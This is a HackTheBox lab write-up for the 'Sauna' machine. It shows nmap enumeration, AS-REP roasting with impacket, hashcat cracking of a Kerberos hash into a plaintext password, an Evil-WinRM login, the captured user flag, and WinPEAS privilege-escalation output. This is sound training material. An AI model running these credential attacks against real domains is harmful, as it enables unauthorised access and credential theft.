> For the complete documentation index, see [llms.txt](https://truck-2-tech-security.gitbook.io/writeups-and-labs/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://truck-2-tech-security.gitbook.io/writeups-and-labs/security-research/hackthebox/sauna.md).

# Sauna

## Initial Foothold

### Nmap

{% code overflow="wrap" expandable="true" %}

```bash
┌──(kali㉿kali)-[~/htb]
└─$ sudo nmap 10.129.95.180
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-07-17 19:14 CDT
Nmap scan report for 10.129.95.180
Host is up (0.052s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
5985/tcp open  wsman

Nmap done: 1 IP address (1 host up) scanned in 4.43 seconds
                                                                                                                                                            
                                                                                                                                                             
┌──(kali㉿kali)-[~/htb]
└─$ sudo nmap -sC -sV -O -A 10.129.95.180 -oA ~/htb/sauna/                 
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-07-17 19:16 CDT
Nmap scan report for 10.129.95.180
Host is up (0.051s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-18 07:16:34Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h00m00s
| smb2-time: 
|   date: 2025-07-18T07:16:45
|_  start_date: N/A

TRACEROUTE (using port 53/tcp)
HOP RTT      ADDRESS
1   52.22 ms 10.10.14.1
2   52.25 ms 10.129.95.180

OS and Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 65.41 seconds

```

{% endcode %}

***

### Enumeration

> Windows Server 2019;

> Domain: EGOTISTICAL-BANK.LOCAL0.

> IIS 10.0

> Clock Skew: 7h

***

#### 80

![](/files/4YwgyjcS7Ac6g0ex3WtG)

#### 88

![](/files/p0WEhAxXQlG7cndT5ET3)

{% code overflow="wrap" expandable="true" %}

```bash
┌──(kali㉿kali)-[~/htb/sauna/username-anarchy]
└─$ sudo impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/ -dc-ip 10.129.95.180 -usersfile anarchy_names.txt -format hashcat -outputfile vulnerable_users.txt 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:234b03b8d158da33b728dd3c50da26c5$33cb15c859e3b742f184288f4aa7a6a889f4bcf11be758d6e37a4e9763d59f1cdca3952d4f3cb3d9dd8a24713b6bb0ffb2815e1f6b34a99166c0796a63f3ee366ca9781c1d229b394c1e79c1f25b3a8e340120bb907f6ed80ac1312c38f2d58f75bd50a41d971197a4af56a108014ffdb83c4c39adcc54e8593f731e5d12901b79c6ccf740f47750408e207c4312a27bb1d5f888a3f43c6ef005755abba605734173f378536a7a678560d31b01f3f4f1a1684852cfe020c7104b9825dd5f117776a8ae65f3b208c51a50caef862b0954a8f3fa0aa1b27a3e43427f8d124c0958bc7c971a02e0c548231e3f465b72099505aec87973f546086d8993f3a4348f35
```

{% endcode %}

![](/files/cjSlTDhOclDPxsarEHwS)

{% code overflow="wrap" expandable="true" %}

```bash
┌──(kali㉿kali)-[~/htb/sauna/username-anarchy]
└─$ hashcat -m 18200 '$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:234b03b8d158da33b728dd3c50da26c5$33cb15c859e3b742f184288f4aa7a6a889f4bcf11be758d6e37a4e9763d59f1cdca3952d4f3cb3d9dd8a24713b6bb0ffb2815e1f6b34a99166c0796a63f3ee366ca9781c1d229b394c1e79c1f25b3a8e340120bb907f6ed80ac1312c38f2d58f75bd50a41d971197a4af56a108014ffdb83c4c39adcc54e8593f731e5d12901b79c6ccf740f47750408e207c4312a27bb1d5f888a3f43c6ef005755abba605734173f378536a7a678560d31b01f3f4f1a1684852cfe020c7104b9825dd5f117776a8ae65f3b208c51a50caef862b0954a8f3fa0aa1b27a3e43427f8d124c0958bc7c971a02e0c548231e3f465b72099505aec87973f546086d8993f3a4348f35' /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #1: cpu-sandybridge-11th Gen Intel(R) Core(TM) i7-11800H @ 2.30GHz, 6939/13942 MB (2048 MB allocatable), 6MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:234b03b8d158da33b728dd3c50da26c5$33cb15c859e3b742f184288f4aa7a6a889f4bcf11be758d6e37a4e9763d59f1cdca3952d4f3cb3d9dd8a24713b6bb0ffb2815e1f6b34a99166c0796a63f3ee366ca9781c1d229b394c1e79c1f25b3a8e340120bb907f6ed80ac1312c38f2d58f75bd50a41d971197a4af56a108014ffdb83c4c39adcc54e8593f731e5d12901b79c6ccf740f47750408e207c4312a27bb1d5f888a3f43c6ef005755abba605734173f378536a7a678560d31b01f3f4f1a1684852cfe020c7104b9825dd5f117776a8ae65f3b208c51a50caef862b0954a8f3fa0aa1b27a3e43427f8d124c0958bc7c971a02e0c548231e3f465b72099505aec87973f546086d8993f3a4348f35:**Thestrokes23**
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:234b03b...348f35
Time.Started.....: Thu Jul 17 21:46:29 2025 (4 secs)
Time.Estimated...: Thu Jul 17 21:46:33 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2726.0 kH/s (1.56ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10543104/14344385 (73.50%)
Rejected.........: 0/10543104 (0.00%)
Restore.Point....: 10536960/14344385 (73.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Tiffany95 -> Teague51
Hardware.Mon.#1..: Util: 78%

Started: Thu Jul 17 21:46:28 2025
Stopped: Thu Jul 17 21:46:34 2025

```

{% endcode %}

### FSmith user password

```jsx
**Thestrokes23**
```

#### 5985

![](/files/wO4CD81iBjkH3fHbmG1a)

> Thanks to the AS-REP roast, we were able to obtain the hash of the fsmith user, and then crack the password. Since 5985 was open, I immediately thought evilWinRM.

![](/files/zsvqSQahtY2MEJTOjlWJ)

{% code overflow="wrap" expandable="true" %}

```bash
*Evil-WinRM* PS C:\\Users\\FSmith> ls

    Directory: C:\\Users\\FSmith

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        1/23/2020  10:01 AM                Desktop
d-r---        1/24/2020  10:40 AM                Documents
d-r---        9/15/2018  12:19 AM                Downloads
d-r---        9/15/2018  12:19 AM                Favorites
d-r---        9/15/2018  12:19 AM                Links
d-r---        9/15/2018  12:19 AM                Music
d-r---        9/15/2018  12:19 AM                Pictures
d-----        9/15/2018  12:19 AM                Saved Games
d-r---        9/15/2018  12:19 AM                Videos

*Evil-WinRM* PS C:\\Users\\FSmith> cd Desktop
*Evil-WinRM* PS C:\\Users\\FSmith\\Desktop> ls

    Directory: C:\\Users\\FSmith\\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        7/18/2025  12:13 AM             34 user.txt

*Evil-WinRM* PS C:\\Users\\FSmith\\Desktop> cat user.txt
b455ca7c063649509494edc4731086cc
*Evil-WinRM* PS C:\\Users\\FSmith\\Desktop> 
```

{% endcode %}

## User.txt

```jsx
b455ca7c063649509494edc4731086cc
```

## Privilege Escalation

### WinPeas

{% code overflow="wrap" expandable="true" %}

```bash

               ((((((((((((((((((((((((((((((((                                                                                                              
        (((((((((((((((((((((((((((((((((((((((((((                                                                                                          
      ((((((((((((((**********/##########(((((((((((((                                                                                                       
    ((((((((((((********************/#######(((((((((((                                                                                                      
    ((((((((******************/@@@@@/****######((((((((((                                                                                                    
    ((((((********************@@@@@@@@@@/***,####((((((((((                                                                                                  
    (((((********************/@@@@@%@@@@/********##(((((((((                                                                                                 
    (((############*********/%@@@@@@@@@/************((((((((                                                                                                 
    ((##################(/******/@@@@@/***************((((((                                                                                                 
    ((#########################(/**********************(((((                                                                                                 
    ((##############################(/*****************(((((                                                                                                 
    ((###################################(/************(((((                                                                                                 
    ((#######################################(*********(((((                                                                                                 
    ((#######(,.***.,(###################(..***.*******(((((                                                                                                 
    ((#######*(#####((##################((######/(*****(((((                                                                                                 
    ((###################(/***********(##############()(((((                                                                                                 
    (((#####################/*******(################)((((((                                                                                                 
    ((((############################################)((((((                                                                                                  
    (((((##########################################)(((((((                                                                                                  
    ((((((########################################)(((((((                                                                                                   
    ((((((((####################################)((((((((                                                                                                    
    (((((((((#################################)(((((((((                                                                                                     
        ((((((((((##########################)(((((((((                                                                                                       
              ((((((((((((((((((((((((((((((((((((((                                                                                                         
                 ((((((((((((((((((((((((((((((                                                                                                              

ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own devices and/or with the device owner's permission.                                        
                                                                                                                                                             
  WinPEAS-ng by @hacktricks_live                                                                                                                             

       /---------------------------------------------------------------------------------\\                                                                   
       |                             Do you like PEASS?                                  |                                                                   
       |---------------------------------------------------------------------------------|                                                                   
       |         Learn Cloud Hacking       :     training.hacktricks.xyz                 |                                                                   
       |         Follow on Twitter         :     @hacktricks_live                        |                                                                   
       |         Respect on HTB            :     SirBroccoli                             |                                                                   
       |---------------------------------------------------------------------------------|                                                                   
       |                                 Thank you!                                      |                                                                   
       \\---------------------------------------------------------------------------------/                                                                   
                                                                                                                                                             
  [+] Legend:
         Red                Indicates a special privilege over an object or something is misconfigured
         Green              Indicates that some protection is enabled or something is well configured
         Cyan               Indicates active users
         Blue               Indicates disabled users
         LightYellow        Indicates links

 You can find a Windows local PE Checklist here: <https://book.hacktricks.wiki/en/windows-hardening/checklist-windows-privilege-escalation.html>
   Creating Dynamic lists, this could take a while, please wait...                                                                                           
   - Loading sensitive_files yaml definitions file...
   - Loading regexes yaml definitions file...
   - Checking if domain...
   - Getting Win32_UserAccount info...
Error while getting Win32_UserAccount info: System.Management.ManagementException: Access denied
   at System.Management.ThreadDispatch.Start()                                                                                                               
   at System.Management.ManagementScope.Initialize()                                                                                                         
   at System.Management.ManagementObjectSearcher.Initialize()                                                                                                
   at System.Management.ManagementObjectSearcher.Get()                                                                                                       
   at winPEAS.Checks.Checks.CreateDynamicLists(Boolean isFileSearchEnabled)                                                                                  
   - Creating current user groups list...
   - Creating active users list (local only)...
  [X] Exception: Object reference not set to an instance of an object.
   - Creating disabled users list...
  [X] Exception: Object reference not set to an instance of an object.
   - Admin users list...
  [X] Exception: Object reference not set to an instance of an object.
   - Creating AppLocker bypass list...
   - Creating files/directories list for search...

ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ System Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

ÉÍÍÍÍÍÍÍÍÍÍ¹ Basic System Information
È Check if the Windows versions is vulnerable to some known exploit <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#version-exploits>                                                                                                                                      
  [X] Exception: Access is denied

ÉÍÍÍÍÍÍÍÍÍÍ¹ Showing All Microsoft Updates
  [X] Exception: Creating an instance of the COM component with CLSID {B699E5E8-67FF-4177-88B0-3684A3388BFB} from the IClassFactory failed due to the following error: 80070005 Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED)).                                                                  

ÉÍÍÍÍÍÍÍÍÍÍ¹ System Last Shutdown Date/time (from Registry)
                                                                                                                                                             
    Last Shutdown Date/time        :    7/26/2021 9:51:18 AM

ÉÍÍÍÍÍÍÍÍÍÍ¹ User Environment Variables
È Check for some passwords or keys in the env variables 
    COMPUTERNAME: SAUNA
    PUBLIC: C:\\Users\\Public
    LOCALAPPDATA: C:\\Users\\FSmith\\AppData\\Local
    PSModulePath: C:\\Users\\FSmith\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules
    PROCESSOR_ARCHITECTURE: AMD64
    Path: C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\OpenSSH\\;C:\\Users\\FSmith\\AppData\\Local\\Microsoft\\WindowsApps
    CommonProgramFiles(x86): C:\\Program Files (x86)\\Common Files
    ProgramFiles(x86): C:\\Program Files (x86)
    PROCESSOR_LEVEL: 25
    ProgramFiles: C:\\Program Files
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
    USERPROFILE: C:\\Users\\FSmith
    SystemRoot: C:\\Windows
    ALLUSERSPROFILE: C:\\ProgramData
    DriverData: C:\\Windows\\System32\\Drivers\\DriverData
    ProgramData: C:\\ProgramData
    PROCESSOR_REVISION: 0101
    USERNAME: FSmith
    CommonProgramW6432: C:\\Program Files\\Common Files
    CommonProgramFiles: C:\\Program Files\\Common Files
    OS: Windows_NT
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    ComSpec: C:\\Windows\\system32\\cmd.exe
    SystemDrive: C:
    TEMP: C:\\Users\\FSmith\\AppData\\Local\\Temp
    NUMBER_OF_PROCESSORS: 2
    APPDATA: C:\\Users\\FSmith\\AppData\\Roaming
    TMP: C:\\Users\\FSmith\\AppData\\Local\\Temp
    ProgramW6432: C:\\Program Files
    windir: C:\\Windows
    USERDOMAIN: EGOTISTICALBANK
    USERDNSDOMAIN: EGOTISTICAL-BANK.LOCAL

ÉÍÍÍÍÍÍÍÍÍÍ¹ System Environment Variables
È Check for some passwords or keys in the env variables 
    ComSpec: C:\\Windows\\system32\\cmd.exe
    DriverData: C:\\Windows\\System32\\Drivers\\DriverData
    OS: Windows_NT
    Path: C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\OpenSSH\\
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
    PROCESSOR_ARCHITECTURE: AMD64
    PSModulePath: C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules
    TEMP: C:\\Windows\\TEMP
    TMP: C:\\Windows\\TEMP
    USERNAME: SYSTEM
    windir: C:\\Windows
    NUMBER_OF_PROCESSORS: 2
    PROCESSOR_LEVEL: 25
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    PROCESSOR_REVISION: 0101

ÉÍÍÍÍÍÍÍÍÍÍ¹ Audit Settings
È Check what is being logged 
    Not Found

ÉÍÍÍÍÍÍÍÍÍÍ¹ Audit Policy Settings - Classic & Advanced

ÉÍÍÍÍÍÍÍÍÍÍ¹ WEF Settings
È Windows Event Forwarding, is interesting to know were are sent the logs 
    Not Found

ÉÍÍÍÍÍÍÍÍÍÍ¹ LAPS Settings
È If installed, local administrator password is changed frequently and is restricted by ACL 
    LAPS Enabled: LAPS not installed

ÉÍÍÍÍÍÍÍÍÍÍ¹ Wdigest
È If enabled, plain-text crds could be stored in LSASS <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#wdigest>                                                                                                                                                            
    Wdigest is not enabled

ÉÍÍÍÍÍÍÍÍÍÍ¹ LSA Protection
È If enabled, a driver is needed to read LSASS memory (If Secure Boot or UEFI, RunAsPPL cannot be disabled by deleting the registry key) <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#lsa-protection>                                                                   
    LSA Protection is not enabled

ÉÍÍÍÍÍÍÍÍÍÍ¹ Credentials Guard
È If enabled, a driver is needed to read LSASS memory <https://book.hacktricks.wiki/windows-hardening/stealing-credentials/credentials-protections#credentials-guard>                                                                                                                                                       
    CredentialGuard is not enabled

ÉÍÍÍÍÍÍÍÍÍÍ¹ Cached Creds
È If > 0, credentials will be cached in the registry and accessible by SYSTEM user <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#cached-credentials>                                                                                                                     
    cachedlogonscount is 10

ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating saved credentials in Registry (CurrentPass)

ÉÍÍÍÍÍÍÍÍÍÍ¹ AV Information
  [X] Exception: Invalid namespace 
    No AV was detected!!
    Not Found

ÉÍÍÍÍÍÍÍÍÍÍ¹ Windows Defender configuration
  Local Settings
  Group Policy Settings

ÉÍÍÍÍÍÍÍÍÍÍ¹ UAC Status
È If you are in the Administrators group check how to bypass the UAC <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#from-administrator-medium-to-high-integrity-level--uac-bypasss>                                                                                       
    ConsentPromptBehaviorAdmin: 1 - PromptOnSecureDesktop
    EnableLUA: 1
    LocalAccountTokenFilterPolicy: 
    FilterAdministratorToken: 
      [*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken != 1.
      [-] Only the RID-500 local admin account can be used for lateral movement.                                                                             

ÉÍÍÍÍÍÍÍÍÍÍ¹ PowerShell Settings
    PowerShell v2 Version: 2.0
    PowerShell v5 Version: 5.1.17763.1
    PowerShell Core Version: 
    Transcription Settings: 
    Module Logging Settings: 
    Scriptblock Logging Settings: 
    PS history file: 
    PS history size: 

ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating PowerShell Session Settings using the registry
      You must be an administrator to run this check

ÉÍÍÍÍÍÍÍÍÍÍ¹ PS default transcripts history
È Read the PS history inside these files (if any)

ÉÍÍÍÍÍÍÍÍÍÍ¹ HKCU Internet Settings
    DisableCachingOfSSLPages: 0
    IE5_UA_Backup_Flag: 5.0
    PrivacyAdvanced: 1
    SecureProtocols: 2688
    User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
    CertificateRevocation: 1
    ZonesSecurityUpgrade: System.Byte[]

ÉÍÍÍÍÍÍÍÍÍÍ¹ HKLM Internet Settings
    ActiveXCache: C:\\Windows\\Downloaded Program Files
    CodeBaseSearchPath: CODEBASE
    EnablePunycode: 1
    MinorVersion: 0
    WarnOnIntranet: 1

ÉÍÍÍÍÍÍÍÍÍÍ¹ Drives Information
È Remember that you should search more info inside the other drives 
    C:\\ (Type: Fixed)(Filesystem: NTFS)(Available space: 7 GB)(Permissions: Users [Allow: AppendData/CreateDirectories])

ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking WSUS
È  <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#wsus>
    Not Found

ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking KrbRelayUp
È  <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#krbrelayup>
  The system is inside a domain (EGOTISTICALBANK) so it could be vulnerable.
È You can try <https://github.com/Dec0ne/KrbRelayUp> to escalate privileges

ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking If Inside Container
È If the binary cexecsvc.exe or associated service exists, you are inside Docker 
You are NOT inside a container

ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking AlwaysInstallElevated
È  <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#alwaysinstallelevated>
    AlwaysInstallElevated isn't available

ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerate LSA settings - auth packages included
                                                                                                                                                             
    auditbasedirectories                 :       0
    auditbaseobjects                     :       0
    Bounds                               :       00-30-00-00-00-20-00-00
    crashonauditfail                     :       0
    fullprivilegeauditing                :       00
    LimitBlankPasswordUse                :       1
    NoLmHash                             :       1
    Security Packages                    :       ""
    Notification Packages                :       rassfm,scecli
    Authentication Packages              :       msv1_0
    LsaPid                               :       636
    LsaCfgFlagsDefault                   :       0
    SecureBoot                           :       1
    ProductType                          :       7
    disabledomaincreds                   :       0
    everyoneincludesanonymous            :       0
    forceguest                           :       0
    restrictanonymous                    :       0
    restrictanonymoussam                 :       1

ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating NTLM Settings
  LanmanCompatibilityLevel    :  (Send NTLMv2 response only - Win7+ default)
                                                                                                                                                             

  NTLM Signing Settings                                                                                                                                      
      ClientRequireSigning    : False
      ClientNegotiateSigning  : True
      ServerRequireSigning    : True
      ServerNegotiateSigning  : True
      LdapSigning             : Negotiate signing (Negotiate signing)

  Session Security                                                                                                                                           
      NTLMMinClientSec        : 536870912 (Require 128-bit encryption)
      NTLMMinServerSec        : 536870912 (Require 128-bit encryption)
                                                                                                                                                             

  NTLM Auditing and Restrictions                                                                                                                             
      InboundRestrictions     :  (Not defined)
      OutboundRestrictions    :  (Not defined)
      InboundAuditing         :  (Not defined)
      OutboundExceptions      :

ÉÍÍÍÍÍÍÍÍÍÍ¹ Display Local Group Policy settings - local users/machine

ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking AppLocker effective policy
   AppLockerPolicy version: 1
   listing rules:

ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating Printers (WMI)

ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating Named Pipes
  Name                                                                                                 CurrentUserPerms                                                       Sddl

  eventlog                                                                                             Everyone [Allow: WriteData/CreateFiles]                                O:LSG:LSD:P(A;;0x12019b;;;WD)(A;;CC;;;OW)(A;;0x12008f;;;S-1-5-80-880578595-1860270145-482643319-2788375705-1540778122)

  ROUTER                                                                                               Everyone [Allow: WriteData/CreateFiles]                                O:SYG:SYD:P(A;;0x12019b;;;WD)(A;;0x12019b;;;AN)(A;;FA;;;SY)

  RpcProxy\\49673                                                                                       Everyone [Allow: WriteData/CreateFiles]                                O:BAG:SYD:(A;;0x12019b;;;WD)(A;;0x12019b;;;AN)(A;;FA;;;BA)

  RpcProxy\\593                                                                                         Everyone [Allow: WriteData/CreateFiles]                                O:NSG:NSD:(A;;0x12019b;;;WD)(A;;RC;;;OW)(A;;0x12019b;;;AN)(A;;FA;;;S-1-5-80-521322694-906040134-3864710659-1525148216-3451224162)(A;;FA;;;S-1-5-80-979556362-403687129-3954533659-2335141334-1547273080)

  vgauth-service                                                                                       Everyone [Allow: WriteData/CreateFiles]                                O:BAG:SYD:P(A;;0x12019f;;;WD)(A;;FA;;;SY)(A;;FA;;;BA)

ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating AMSI registered providers
    Provider:       {2781761E-28E0-4109-99FE-B9D127C57AFE}
    Path:           "C:\\ProgramData\\Microsoft\\Windows Defender\\platform\\4.18.1911.3-0\\MpOav.dll"

   =================================================================================================

ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating Sysmon configuration
      You must be an administrator to run this check

ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating Sysmon process creation logs (1)
      You must be an administrator to run this check

ÉÍÍÍÍÍÍÍÍÍÍ¹ Installed .NET versions
                                                                                                                                                             

ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Interesting Events information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

ÉÍÍÍÍÍÍÍÍÍÍ¹ Printing Explicit Credential Events (4648) for last 30 days - A process logged on using plaintext credentials
                                                                                                                                                             
      You must be an administrator to run this check

ÉÍÍÍÍÍÍÍÍÍÍ¹ Printing Account Logon Events (4624) for the last 10 days.
                                                                                                                                                             
      You must be an administrator to run this check

ÉÍÍÍÍÍÍÍÍÍÍ¹ Process creation events - searching logs (EID 4688) for sensitive data.
                                                                                                                                                             
      You must be an administrator to run this check

ÉÍÍÍÍÍÍÍÍÍÍ¹ PowerShell events - script block logs (EID 4104) - searching for sensitive data.
                                                                                                                                                             
  [X] Exception: Attempted to perform an unauthorized operation.

ÉÍÍÍÍÍÍÍÍÍÍ¹ Displaying Power off/on events for last 5 days
                                                                                                                                                             
System.UnauthorizedAccessException: Attempted to perform an unauthorized operation.
   at System.Diagnostics.Eventing.Reader.EventLogException.Throw(Int32 errorCode)
   at System.Diagnostics.Eventing.Reader.NativeWrapper.EvtQuery(EventLogHandle session, String path, String query, Int32 flags)
   at System.Diagnostics.Eventing.Reader.EventLogReader..ctor(EventLogQuery eventQuery, EventBookmark bookmark)
   at winPEAS.Helpers.MyUtils.GetEventLogReader(String path, String query, String computerName)
   at winPEAS.Info.EventsInfo.Power.Power.<GetPowerEventInfos>d__0.MoveNext()
   at winPEAS.Checks.EventsInfo.PowerOnEvents()

ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Users Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

ÉÍÍÍÍÍÍÍÍÍÍ¹ Users
È Check if you have some admin equivalent privileges <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#users--groups>                                                                                                                                                        
  [X] Exception: Object reference not set to an instance of an object.
  Current user: FSmith
  Current groups: Domain Users, Everyone, Builtin\\Remote Management Users, Users, Builtin\\Pre-Windows 2000 Compatible Access, Network, Authenticated Users, This Organization, NTLM Authentication
   =================================================================================================

    Not Found

ÉÍÍÍÍÍÍÍÍÍÍ¹ Current User Idle Time
   Current User   :     EGOTISTICALBANK\\FSmith
   Idle Time      :     02h:53m:28s:812ms

ÉÍÍÍÍÍÍÍÍÍÍ¹ Display Tenant information (DsRegCmd.exe /status)
   Tenant is NOT Azure AD Joined.

ÉÍÍÍÍÍÍÍÍÍÍ¹ Current Token privileges
È Check if you can escalate privilege using some enabled token <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#token-manipulation>                                                                                                                                         
